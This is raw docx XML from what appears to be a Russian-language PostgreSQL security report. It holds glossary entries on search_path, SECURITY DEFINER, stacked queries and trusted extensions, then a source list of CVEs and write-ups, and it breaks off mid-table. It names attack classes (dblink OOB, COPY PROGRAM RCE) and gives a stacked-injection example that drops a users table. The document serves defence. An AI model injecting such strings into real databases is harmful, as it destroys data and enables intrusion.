          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">search_path</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">GUC, определяющий порядок поиска неквалифицированных object-names. Default — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"$user", public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (сначала роль-name schema, потом public). Атаки CVE-2018-1058-стиля используют trojan-функцию в public с тем же именем, что функция в pg_catalog. PG 15+ закрыл CREATE на public для PUBLIC (новые кластеры) — частично. См. 2.4 + 3.13.2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SECURITY DEFINER / SECURITY INVOKER</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Атрибуты функций: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SECURITY DEFINER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — функция выполняется в контексте owner-а (как UNIX setuid); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SECURITY INVOKER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — в контексте current_user (default). SD-функции — главная сurface для privilege escalation: 3.13.6 (search_path manipulation), 3.16.5 (identifier injection в SD-функции), 3.17.5 (RLS bypass через SD-функцию от superuser-owner-а).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Simple query protocol</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Wire-protocol режим: одно сообщение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с SQL-строкой. Сервер парсит строку как последовательность statement-ов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 stacked queries проходят. Противоположное — extended query protocol. Драйвер выбирает режим (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">preferQueryMode=simple</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в pgjdbc, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">simple_protocol=true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в pgx); под этим режимом server-side защита от stacked queries не работает.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL injection (классическое определение)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Code injection в SQL-контекст через user-controlled input, который оказывается интерпретирован сервером как SQL-tokens, а не как value. PostgreSQL-специфика — широкая поверхность атак: помимо классических UNION / boolean / time-based — OOB через dblink, RCE через COPY PROGRAM / plperlu, error-based через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">::regclass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, RLS bypass через subquery. Защита — параметризация (5.1), identifier-цитирование (5.2), наименьшие привилегии (5.3).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Stacked queries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Multi-statement injection через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Несколько команд в одной строке: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT 1; DROP TABLE users; --</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Сервер выполняет их последовательно в simple query protocol; в extended protocol — отвергает на стадии Parse. Подробно — 3.5.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Trusted extension</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Расширение, помеченное </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">trusted = true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в control-файле. Non-superuser с CREATE на DB может установить через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE EXTENSION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. PostgreSQL 13 ввёл понятие. ~24 trusted extensions в стандартной поставке PG 13+. Список не статичен — меняется между мажорами (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">plperl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> добавлен в trusted, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">xml2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> остался untrusted). 2.3 + R28 + 5.4.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">USAGE / EXECUTE / CREATE privileges</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Object-уровень permissions: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USAGE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — для schemas (можно referencing objects внутри), для types, для domains, для languages, для foreign data wrappers.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EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — для функций (можно вызывать).</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CREATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — для databases (можно создавать schemas), для schemas (можно создавать объекты), для tablespaces.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Стандарт PostgreSQL inherited из SQL standard. Управляются через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GRANT</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REVOKE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Audit-команды — в 5.3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Wire protocol</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Network-протокол между клиентом и сервером PostgreSQL. Состоит из startup phase (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">StartupMessage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, аутентификация) и query phase (simple / extended modes — выше). Версия protocol совпадает с major-версией PostgreSQL (3.0 на дату 2026). libpq — reference implementation на C; драйверы pgjdbc / asyncpg / pgx / node-postgres / Npgsql реализуют свой stack независимо от libpq.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Связь с разделами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2.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Архитектура исполнения SQL (simple vs extended) — фундаментальные определения для wire protocol.</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2.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Роли и privileges — definitions для предопределённых ролей.</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2.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Расширения — trusted / untrusted определения.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2.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> search_path и public — расшифровка.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5.X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — практическое применение терминов в защитном контексте.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">6.4 Список всех источников</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сводный список ссылок, использованных в разделах 1–5. Сгруппирован по типу: research-якоря (R1–R28), официальные docs, security advisories, vendor blogs, CTF / writeups, OWASP / индустриальные стандарты.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Research-якоря R1–R28</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Полные карточки — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sources/research.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Каждый R# имеет primary-источник и backup-ссылки. Здесь — короткий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R#</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CVE / pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E0E0E0" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Primary source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dblink_connect OOB</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HackTricks dblink page</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PDKT-Team CTF writeup</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postgres_fdw SSRF</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postgres_fdw docs</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ibreak.software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COPY FROM PROGRAM</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Greenwolf</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Rapid7 Metasploit module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pg_read_server_files / lo_import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System Information Functions</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Predefined Roles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Dollar-quoted strings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Lexical Structure — Dollar-Quoted String Constants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Rapid7 disclosure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PoC repo</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RedRays step-by-step</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CVE-2024-10977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CVE-2023-39418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PG 15.4 release notes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CVE-2023-2454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cve.news разбор</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CVE-2023-5868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Red Hat Bugzilla 2247168</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CVE-2022-1552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CVE-2022-2625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EDB разбор</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CVE-2024-4317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pganalyze разбор</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Identifier injection в plpgsql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format() docs</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SQL-injection-safe pattern gist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R19</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Error-based через CAST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PortSwigger SQL injection cheat sheet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Stacked queries по драйверам</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libpq PQexec / PQexecParams</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pgjdbc PreferQueryMode</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asyncpg issue #30</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pgx issue #1090</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node-postgres issue #757</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psycopg3 differences from psycopg2</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Npgsql basic usage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CVE-2025-1094 → COPY TO PROGRAM chain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SecureLayer7 разбор chain</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Rapid7 advisory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CTE с side effects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WITH ... Data-Modifying Statements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CVE-2025-12817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PostgreSQL advisory</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pgAdmin CVE-2025-13780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Cyber Security News coverage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GBHackers article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CVE-2025-8713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GBHackers article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CVE-2025-4207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IBM Security Bulletin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R28</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Trusted extensions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color w:val="0563C1"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve">CREATE EXTENSION docs</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Severalnines PG13 trusted list</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
